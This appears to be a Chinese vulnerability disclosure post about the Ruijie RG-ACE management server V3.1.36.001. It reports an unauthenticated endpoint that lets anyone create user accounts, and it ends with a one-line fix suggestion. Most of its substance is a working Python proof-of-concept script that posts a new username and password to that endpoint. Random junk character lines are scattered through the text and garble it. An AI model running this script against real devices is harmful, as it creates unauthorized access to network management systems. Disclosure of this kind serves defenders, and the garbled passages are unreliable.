锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

" d3 _+ x/ ?/ R% C& D9 @
! M' N- {: H" |; q9 {6 j: C* g测试的具体版本是
3 U: W" f9 M+ ?, t) b产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
9 q8 D1 _, w7 x8 D& d

$ v6 n- y. b% {) C漏洞证明：
0 z; o; v* z4 ?8 q
. C4 O& ]' O1 F
! O9 G6 s: y8 Y
8 M2 p# w/ i4 h( x4 I
' f+ m" s3 n# F) s( {
0 o' T! A  D1 y! y( V3 a
执行脚本
#! /usr/bin/env python
+ @3 E& J" g3 a#coding=gbk
0 e5 J  P0 F- B#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
0 A* f! z# U8 m  b6 A( h# [7 murl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
6 E* \% L: b! {! ?, v2 t9 Vopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
! b$ l$ }9 m9 R( [& O& T("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
3 n; c6 b& F# t( e6 m8 a: Z("email",""),
" F- l6 @! s# W% W("mobilePhone",""),
("officePhone",""),
" P) S/ i5 p  b; O9 @' p("addr",""),
("submit","确定"))
; ^+ e9 }& \0 G4 F2 Aurllib2.install_opener(opener)
* }7 F; X, Z* X( s  p: |- Lp=urllib2.urlopen(url, urllib.urlencode(post)).read()
6 ^7 j) j7 i3 V8 O+ j( W1 Xprint "Done"

8 W! Y' \2 l+ S& [登录，连接设备

& _) F9 W$ U# h0 y( H0 b

3 d1 h* ?  G0 w6 [+ ]: m9 x
+ c3 _8 h, y* E* z9 c+ K" p4 J
默认的管理员admin权限更大点



$ [& g1 ?. p6 t* Q. D
+ }& h1 A3 e% S! C5 _
; @5 w/ |9 T3 `* B2 [( `修复方案：
5 ?4 }+ ]- @$ ^% L加强对接口的权限验证
/ l* X- @4 U: \9 J) U& t1 {4 `